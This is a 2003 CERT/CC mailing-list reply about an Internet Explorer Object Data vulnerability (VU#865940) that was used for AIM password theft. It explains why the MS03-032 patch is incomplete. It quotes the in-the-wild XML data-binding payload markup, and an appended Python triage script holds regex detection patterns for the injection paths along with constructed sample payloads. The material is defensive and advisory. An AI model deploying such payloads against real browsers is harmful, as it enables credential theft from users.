Message-ID: <200309241840.h8OIeZR06977@watson.blue.cert.org>
Date: Wed, 24 Sep 2003 14:35:06 -0400
From: "CERT(R) Coordination Center" <cert@...t.org>
To: "Thor Larholm" <thor@...x.com>
Cc: "CERT(R) Coordination Center" <cert@...t.org>,
	"Mark Coleman" <markc@...ontown.com>, bugtraq@...urityfocus.org
Subject: RE: [Fwd: Re: AIM Password theft]  VU#865940


-----BEGIN PGP SIGNED MESSAGE-----

Thor Larholm <thor@...x.com> writes:

> This is just a simple exploit utilizing the Object Data vulnerability
> discovered by Drew Copley, coupled with the GreyMagic no-script HTML
> rendering as demonstrated earlier on this list and others by jelmer.
> 
> Tell your user to go install MS03-032, which he obviously did not do as
> MS03-032 patches this vulnerability. MS03-032 was released on August 20
> and you can find it at
> 
> http://www.microsoft.com/technet/security/bulletin/MS03-032.asp

At present, the patch for MS03-032 breaks one of at least three
exploit techniques.  The patch does not resolve the vulnerability.
MS03-032 acknowledges this.  I have seen several examples of this
vulnerability being exploited in the wild.

> www.haxr.org contains the following HTML code (with <> replaced by []):
> 
> [span datasrc="#oExec" datafld="counter" dataformatas="html"][/span]
> [xml id="oExec"]
> [security]
> [counter]
> [![CDATA[
> [object data=tracker.php][/object]
> ]]]
> [/counter]
> [/security]
> [/xml]

In particular, the current MS03-032 patch doesn't account for an HTML
document created via XML/data binding:

  <http://greymagic.com/adv/gm001-ie/>

The patch also does not account for an HTML document created via
script:

  <http://www.securityfocus.com/archive/1/336616>

Vulnerability Note VU#865940:

  <http://www.kb.cert.org/vuls/id/865940>


Regards,

  - Art


             Art Manion  --  CERT Coordination Center
    <http://www.cert.org/>   <cert@...t.org>   +1 412-268-7090
         E0 1E DF F5 FC 76 00 32  77 8F 25 F7 B0 2E 2C 27


-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQCVAwUBP3HlHDpmH2w9K/0VAQGBuQQAmrvGlHEXmMx48LhA2dQ/wK8XCqYaVYtD
Y4FPmSvwqZ8phYKhT20Dh9sYGLWHbaJ3sfGA589MOLJwhpZ3aVlunLQ6GjLO1qje
6dab5rVGdgTNzMC87YX2E7RB6uS4K8htL0MhN4LLvbHS402QEeNOhX+Fi2lsLkyi
6uioMggI1Ms=
=Jnmk
-----END PGP SIGNATURE-----
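The message above distinguishes the delivery paths the MS03-032 patch does and does not cover: an `<object data=...>` tag rendered through an HTML-formatted data binding (`dataformatas="html"`) fed from an XML data island, and the same tag assembled at run time by script. The following static triage script is an added example, not code from CERT or from the original post; it flags pages that use either path so an analyst can review captured web content or proxy logs. The regexes, the `find_markup_injection` and `parse_attrs` names, and the sample pages (with placeholder ids and the file name `EXAMPLE.php`) are constructed here.

```python
"""Static triage of HTML for the two markup-injection paths the message says
MS03-032 does not cover: an HTML-formatted data binding (dataformatas="html")
fed from an XML data island, and markup assembled at run time by script.
Added example; regexes and sample pages are constructed here, not from CERT."""
import re

# A start tag and its raw attribute text (crude, but enough for triage).
TAG_RE = re.compile(
    r'<([a-zA-Z][\w:-]*)((?:\s+[^\s=>/]+(?:\s*=\s*(?:"[^"]*"|\'[^\']*\'|[^\s>]+))?)*)\s*/?>',
    re.S)
ATTR_RE = re.compile(r'([^\s=>/]+)(?:\s*=\s*("[^"]*"|\'[^\']*\'|[^\s>]+))?', re.S)
# <xml id="..."> ... </xml> data islands keyed by id; body kept raw so CDATA stays visible.
XML_ISLAND_RE = re.compile(
    r'<xml\b[^>]*\bid\s*=\s*["\']?([\w-]+)["\']?[^>]*>(.*?)</xml\s*>', re.I | re.S)
OBJECT_DATA_RE = re.compile(r'<object\b[^>]*\bdata\s*=', re.I)
SCRIPT_RE = re.compile(r'<script\b[^>]*>(.*?)</script\s*>', re.I | re.S)
DOM_WRITE_RE = re.compile(r'document\.write|innerHTML|insertAdjacentHTML', re.I)


def parse_attrs(attr_text):
    """Return {lowercased name: unquoted value} for one tag's attribute text."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        attrs[m.group(1).lower()] = (m.group(2) or "").strip("\"'")
    return attrs


def find_markup_injection(html):
    """Return [(kind, detail)] for each injection path found; [] for clean pages."""
    findings = []
    islands = {m.group(1).lower(): m.group(2) for m in XML_ISLAND_RE.finditer(html)}

    # Path 1: an element bound to an XML field and told to render that field as HTML.
    for m in TAG_RE.finditer(html):
        attrs = parse_attrs(m.group(2))
        if attrs.get("dataformatas", "").lower() != "html":
            continue
        src = attrs.get("datasrc", "")
        island = islands.get(src[1:].lower()) if src.startswith("#") else None
        if island is not None and OBJECT_DATA_RE.search(island):
            findings.append(("data-binding",
                             f"<{m.group(1).lower()}> bound to island {src} field "
                             f"{attrs.get('datafld', '?')} renders <object data=...>"))

    # Path 2: the <object> tag exists only inside a script string and is written at run time.
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        if OBJECT_DATA_RE.search(body) and DOM_WRITE_RE.search(body):
            findings.append(("script", "<object data=...> assembled by document.write/innerHTML"))
    return findings


# Constructed samples; ids and EXAMPLE.php are placeholders, not taken from any real page.
SAMPLE_BOUND = """
<span datasrc="#island1" datafld="payload" dataformatas="html"></span>
<xml id="island1"><root><payload><![CDATA[
<object data=EXAMPLE.php></object>
]]></payload></root></xml>
"""
SAMPLE_SCRIPT = """
<script>
document.write('<object data="EXAMPLE.php"></object>');
</script>
"""
SAMPLE_CLEAN = """
<span datasrc="#island2" datafld="name" dataformatas="text"></span>
<xml id="island2"><root><name>Hello</name></root></xml>
<script>var x = 1;</script>
"""

if __name__ == "__main__":
    for label, page in (("bound", SAMPLE_BOUND), ("script", SAMPLE_SCRIPT), ("clean", SAMPLE_CLEAN)):
        print(label, find_markup_injection(page))
```

The data-binding check deliberately requires all three pieces (an `#id` `datasrc`, `dataformatas="html"`, and an `<object data=` inside the referenced island) so that ordinary text-formatted bindings are not flagged. The script check is a plain string signature and is trivially evaded by string concatenation or encoding, which is exactly why the message treats a filter on one delivery path as not resolving the underlying vulnerability: the durable fix is the browser-side one, not pattern matching on the page.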

